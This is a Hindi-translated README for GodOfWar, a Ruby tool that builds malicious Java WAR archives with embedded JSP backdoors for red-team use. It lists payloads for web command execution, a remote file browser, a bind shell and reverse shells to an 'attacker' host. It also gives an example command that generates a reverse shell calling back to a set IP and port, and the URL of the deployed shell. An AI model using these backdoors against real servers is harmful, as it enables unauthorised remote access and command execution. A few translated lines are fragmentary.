
GodOfWar - अंतर्निहित पेलोड के साथ दुर्भावनापूर्ण Java WAR निर्माता
पेनिट्रेशन टेस्टिंग / रेड टीमिंग उद्देश्यों के लिए वार पेलोड उत्पन्न करने वाला एक कमांड-लाइन टूल, रूबी में लिखा गया।
.
hhh
hhhhhhh
hhhhhhhh
hhhhhhhh+
hhhhhhhh'
hhhhhhhh.
hhhhhhhhh
..-- hhhhhhhhh
-sh/.. +. hhhhhhhhh:
/+/:-/+ss-` hhhhhhhhhh:
/MMM`ss:``.` hhhhhhhhhh:
.MMMMM: hhhhhhhhhhhhhhhhh:
MMMMMMM: hhhhhhhhhhhhhhhh:
MMMMMMMMMMMMM: hhhhhhhhhhhhhhhh`
:NNm:odh/oMMMNs. hhhhhhhhhhhhhhhh`
./:`smdo+oos++- `++sNMMMMMNmh+
.-y-` ` :. / -dmddhhhhh-
o/- `//o/ /M/ `+hhhhhhhh`
/o :yosmy +y .`.hhhhhhhho
+` /../.: `.y::hhhhhs:`
` `+yys` .sy` /oohhy:
`/:s/-`` `.hh`
..` ` y+
.hNNmmNdymmmmds` :-
hs. ``.. :y- `
-hhmNmddm+ .
`NMMMMMMm
` `oMMy
`. /Md- :o
MMMMMMMMMMMMMMMMMMM:
MMMMMMMMMMMMMMMMMM:
MMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMM.
`MMMMMMMMMMMMM.
:sNMMMNMdo:
``+m:/-
`
GodOfWar - Malicious Java WAR builder.
-l/--list आज़माएँ)
--host/--port आज़माएँ)$ gem install godofwar
$ godofwar -h
सहायता मेन्यू:
-p, --payload PAYLOAD उपलब्ध पेलोड में से एक से war उत्पन्न करता है।
(जाँचें -l/--list)
-H, --host IP_ADDR चुने हुए पेलोड के लिए स्थानीय या रिमोट IP पता
(-p/--payload के साथ प्रयोग करें)
-P, --port PORT चुने हुए पेलोड के लिए स्थानीय या रिमोट पोर्ट
(-p/--payload के साथ प्रयोग करें)
-o, --output [FILE] आउटपुट फ़ाइल और डिप्लॉयमेंट नाम।
(डिफ़ॉल्ट पेलोड का मूल नाम है। जाँचें '-l/--list')
-l, --list सभी उपलब्ध पेलोड सूचीबद्ध करें।
-h, --help यह सहायता संदेश दिखाएँ।
सभी पेलोड सूचीबद्ध करें
$ godofwar -l
├── cmd_get
│ └── Information:
│ ├── Description: Command execution via web interface
│ ├── OS: any
│ ├── Settings: {"false"=>"No Settings required!"}
│ ├── Usage: http://host/cmd.jsp?cmd=whoami
│ ├── References: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│ └── Information:
│ ├── Description: Remote file browser, upload, download, unzip files and native command execution
│ ├── OS: any
│ ├── Settings: {"false"=>"No Settings required!"}
│ ├── Usage: http://host/filebrowser.jsp
│ ├── References: ["http://www.vonloesch.de/filebrowser.html"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│ └── Information:
│ ├── Description: TCP bind shell
│ ├── OS: any
│ ├── Settings: {"port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse-shell.jsp
│ ├── References: ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│ └── Information:
│ ├── Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser.
│ ├── OS: any
│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse_shell_ui.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│ └── Information:
│ ├── Description: TCP reverse shell. LHOST and LPORT are hardcoded
│ ├── OS: any
│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse_shell.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell
LHOST और LPORT के साथ पेलोड उत्पन्न करें
godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy
डिप्लॉयमेंट के बाद, आप अपने शेल पर जा सकते हैं (http://host:8080/puppy/puppy.jsp)
अधिक बैकडोर जोड़कर योगदान देने के लिए:
payloads निर्देशिका के अंतर्गत एक नया फ़ोल्डर बनाएं।jsp फ़ाइल को नवनिर्मित निर्देशिका के अंतर्गत रखें (इसे निर्देशिका का समान नाम दें)।payloads_info.json फ़ाइल को अपडेट करें:
यह जेम MIT लाइसेंस की शर्तों के तहत ओपन सोर्स के रूप में उपलब्ध है।